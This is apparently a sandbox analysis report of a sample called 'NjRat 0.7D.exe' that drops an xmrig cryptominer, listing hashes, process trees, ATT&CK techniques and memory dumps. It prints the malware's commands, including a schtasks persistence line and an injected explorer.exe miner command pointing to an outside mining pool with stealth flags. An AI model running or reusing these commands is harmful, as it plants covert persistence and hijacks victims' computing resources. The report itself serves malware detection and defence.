xmrig | db5575ba91df5cf9571f4ad36d0091b7a3e03ce9aeab80cd87295360046cb47e

Analysis

max time kernel
51s
max time network
58s
platform
windows10-1703_x64
resource
win10-20231020-en
resource tags

arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system
submitted
24/10/2023, 12:37

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Njrat/NjRat 0.7D.exe
Size

2.2MB
MD5

27e353481e08ead38d3f5dd7a4042d01
SHA1

61f6691539aa0201f69a61f2d6b4328c47856ef9
SHA256

0e6a282cdeaf4ec1222b7223a01935f686a7891b36c35b4f6a69fe6a6a1db260
SHA512

ac4ae70b6c5e307bcf535f981132fef00b3182be9c272413c510b16b6a95540595925f53b698e3640200a8b681033e15a117d72b2145e2d3a835bef5154ac9cd
SSDEEP

49152:MP0OMxYLKA67mRRxMQSL/neZW9F8saXeAx5vAoNhaPsQ+Quc393:wMxYLK+RRCQSL/V9FqXeIF2qDct

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral2/memory/5016-34-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/5016-36-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/5016-37-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/5016-40-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/5016-41-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/5016-42-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/5016-43-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/5016-44-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/5016-45-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/5016-46-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/5016-47-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/5016-48-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/5016-49-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/5016-52-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig

Executes dropped EXE 3 IoCs

pid	Process
2812	sihost64.exe
4152	Services.exe
5100	sihost64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4152 set thread context of 5016	4152	Services.exe	80

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3848	schtasks.exe
5056	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4812	NjRat 0.7D.exe
4812	NjRat 0.7D.exe
4152	Services.exe
4152	Services.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
640	Process not Found

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4812	NjRat 0.7D.exe
Token: SeDebugPrivilege	4152	Services.exe
Token: SeLockMemoryPrivilege	5016	explorer.exe
Token: SeLockMemoryPrivilege	5016	explorer.exe

Suspicious use of WriteProcessMemory 29 IoCs

description	pid	Process	procid_target
PID 4812 wrote to memory of 4796	4812	NjRat 0.7D.exe	70
PID 4812 wrote to memory of 4796	4812	NjRat 0.7D.exe	70
PID 4796 wrote to memory of 3848	4796	cmd.exe	72
PID 4796 wrote to memory of 3848	4796	cmd.exe	72
PID 4812 wrote to memory of 2812	4812	NjRat 0.7D.exe	73
PID 4812 wrote to memory of 2812	4812	NjRat 0.7D.exe	73
PID 4812 wrote to memory of 4152	4812	NjRat 0.7D.exe	74
PID 4812 wrote to memory of 4152	4812	NjRat 0.7D.exe	74
PID 4152 wrote to memory of 2416	4152	Services.exe	76
PID 4152 wrote to memory of 2416	4152	Services.exe	76
PID 2416 wrote to memory of 5056	2416	cmd.exe	78
PID 2416 wrote to memory of 5056	2416	cmd.exe	78
PID 4152 wrote to memory of 5100	4152	Services.exe	79
PID 4152 wrote to memory of 5100	4152	Services.exe	79
PID 4152 wrote to memory of 5016	4152	Services.exe	80
PID 4152 wrote to memory of 5016	4152	Services.exe	80
PID 4152 wrote to memory of 5016	4152	Services.exe	80
PID 4152 wrote to memory of 5016	4152	Services.exe	80
PID 4152 wrote to memory of 5016	4152	Services.exe	80
PID 4152 wrote to memory of 5016	4152	Services.exe	80
PID 4152 wrote to memory of 5016	4152	Services.exe	80
PID 4152 wrote to memory of 5016	4152	Services.exe	80
PID 4152 wrote to memory of 5016	4152	Services.exe	80
PID 4152 wrote to memory of 5016	4152	Services.exe	80
PID 4152 wrote to memory of 5016	4152	Services.exe	80
PID 4152 wrote to memory of 5016	4152	Services.exe	80
PID 4152 wrote to memory of 5016	4152	Services.exe	80
PID 4152 wrote to memory of 5016	4152	Services.exe	80
PID 4152 wrote to memory of 5016	4152	Services.exe	80

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Njrat\NjRat 0.7D.exe
"C:\Users\Admin\AppData\Local\Temp\Njrat\NjRat 0.7D.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4812
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4796
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
    3⤵
    - Creates scheduled task(s)
    PID:3848
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
  2⤵
  - Executes dropped EXE
  PID:2812
- C:\Users\Admin\AppData\Local\Temp\Services.exe
  "C:\Users\Admin\AppData\Local\Temp\Services.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4152
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2416
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
      4⤵
      Creates scheduled task(s)
      PID:5056
- - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
    3⤵
    - Executes dropped EXE
    PID:5100
- - C:\Windows\explorer.exe
    C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=7158719 --pass=durker --cpu-max-threads-hint=70 --donate-level=5 --unam-idle-wait=1 --unam-idle-cpu=90 --unam-stealth
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Services.exe

Filesize
2.2MB

MD5
27e353481e08ead38d3f5dd7a4042d01

SHA1
61f6691539aa0201f69a61f2d6b4328c47856ef9

SHA256
0e6a282cdeaf4ec1222b7223a01935f686a7891b36c35b4f6a69fe6a6a1db260

SHA512
ac4ae70b6c5e307bcf535f981132fef00b3182be9c272413c510b16b6a95540595925f53b698e3640200a8b681033e15a117d72b2145e2d3a835bef5154ac9cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services.exe

Filesize
2.2MB

MD5
27e353481e08ead38d3f5dd7a4042d01

SHA1
61f6691539aa0201f69a61f2d6b4328c47856ef9

SHA256
0e6a282cdeaf4ec1222b7223a01935f686a7891b36c35b4f6a69fe6a6a1db260

SHA512
ac4ae70b6c5e307bcf535f981132fef00b3182be9c272413c510b16b6a95540595925f53b698e3640200a8b681033e15a117d72b2145e2d3a835bef5154ac9cd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
7KB

MD5
80e7965f9c926d3c71cad7ab3157bb2f

SHA1
7d38ac1c0030af7fb5ee708f7343002b3b8650bd

SHA256
fdfc3281485c8d6aae0259783785c8725b51e855a9c032eab8b4a8c839b0817b

SHA512
29638cc70cf9329f5679b86fcfe45c41aa6f96e6b601e6e6c15af4748c9ef7f9bd0a1cb3c077b3b93b7388a46442ec86aad7b0762b64d66b0f527004b1f7e13b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
7KB

MD5
80e7965f9c926d3c71cad7ab3157bb2f

SHA1
7d38ac1c0030af7fb5ee708f7343002b3b8650bd

SHA256
fdfc3281485c8d6aae0259783785c8725b51e855a9c032eab8b4a8c839b0817b

SHA512
29638cc70cf9329f5679b86fcfe45c41aa6f96e6b601e6e6c15af4748c9ef7f9bd0a1cb3c077b3b93b7388a46442ec86aad7b0762b64d66b0f527004b1f7e13b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
7KB

MD5
80e7965f9c926d3c71cad7ab3157bb2f

SHA1
7d38ac1c0030af7fb5ee708f7343002b3b8650bd

SHA256
fdfc3281485c8d6aae0259783785c8725b51e855a9c032eab8b4a8c839b0817b

SHA512
29638cc70cf9329f5679b86fcfe45c41aa6f96e6b601e6e6c15af4748c9ef7f9bd0a1cb3c077b3b93b7388a46442ec86aad7b0762b64d66b0f527004b1f7e13b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
7KB

MD5
80e7965f9c926d3c71cad7ab3157bb2f

SHA1
7d38ac1c0030af7fb5ee708f7343002b3b8650bd

SHA256
fdfc3281485c8d6aae0259783785c8725b51e855a9c032eab8b4a8c839b0817b

SHA512
29638cc70cf9329f5679b86fcfe45c41aa6f96e6b601e6e6c15af4748c9ef7f9bd0a1cb3c077b3b93b7388a46442ec86aad7b0762b64d66b0f527004b1f7e13b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
7KB

MD5
80e7965f9c926d3c71cad7ab3157bb2f

SHA1
7d38ac1c0030af7fb5ee708f7343002b3b8650bd

SHA256
fdfc3281485c8d6aae0259783785c8725b51e855a9c032eab8b4a8c839b0817b

SHA512
29638cc70cf9329f5679b86fcfe45c41aa6f96e6b601e6e6c15af4748c9ef7f9bd0a1cb3c077b3b93b7388a46442ec86aad7b0762b64d66b0f527004b1f7e13b

Download Submit
memory/2812-21-0x00007FFB020B0000-0x00007FFB02A9C000-memory.dmp

Filesize
9.9MB

Download
memory/2812-11-0x00000000002E0000-0x00000000002E6000-memory.dmp

Filesize
24KB

Download
memory/2812-16-0x00007FFB020B0000-0x00007FFB02A9C000-memory.dmp

Filesize
9.9MB

Download
memory/2812-19-0x000000001BF10000-0x000000001BF20000-memory.dmp

Filesize
64KB

Download
memory/4152-23-0x00007FFB020B0000-0x00007FFB02A9C000-memory.dmp

Filesize
9.9MB

Download
memory/4152-20-0x0000000001400000-0x0000000001412000-memory.dmp

Filesize
72KB

Download
memory/4152-22-0x000000001C400000-0x000000001C500000-memory.dmp

Filesize
1024KB

Download
memory/4152-33-0x00000000014B0000-0x00000000014BE000-memory.dmp

Filesize
56KB

Download
memory/4152-17-0x00007FFB020B0000-0x00007FFB02A9C000-memory.dmp

Filesize
9.9MB

Download
memory/4152-38-0x00007FFB020B0000-0x00007FFB02A9C000-memory.dmp

Filesize
9.9MB

Download
memory/4812-18-0x00007FFB020B0000-0x00007FFB02A9C000-memory.dmp

Filesize
9.9MB

Download
memory/4812-3-0x000000001C040000-0x000000001C050000-memory.dmp

Filesize
64KB

Download
memory/4812-1-0x00007FFB020B0000-0x00007FFB02A9C000-memory.dmp

Filesize
9.9MB

Download
memory/4812-0-0x00000000000A0000-0x00000000002CE000-memory.dmp

Filesize
2.2MB

Download
memory/5016-42-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/5016-43-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/5016-36-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/5016-52-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/5016-37-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/5016-39-0x0000000000D10000-0x0000000000D24000-memory.dmp

Filesize
80KB

Download
memory/5016-40-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/5016-41-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/5016-49-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/5016-34-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/5016-44-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/5016-45-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/5016-46-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/5016-47-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/5016-48-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/5100-31-0x00007FFB020B0000-0x00007FFB02A9C000-memory.dmp

Filesize
9.9MB

Download
memory/5100-50-0x00007FFB020B0000-0x00007FFB02A9C000-memory.dmp

Filesize
9.9MB

Download
memory/5100-51-0x000000001BF60000-0x000000001BF70000-memory.dmp

Filesize
64KB

Download
memory/5100-32-0x000000001BF60000-0x000000001BF70000-memory.dmp

Filesize
64KB

Download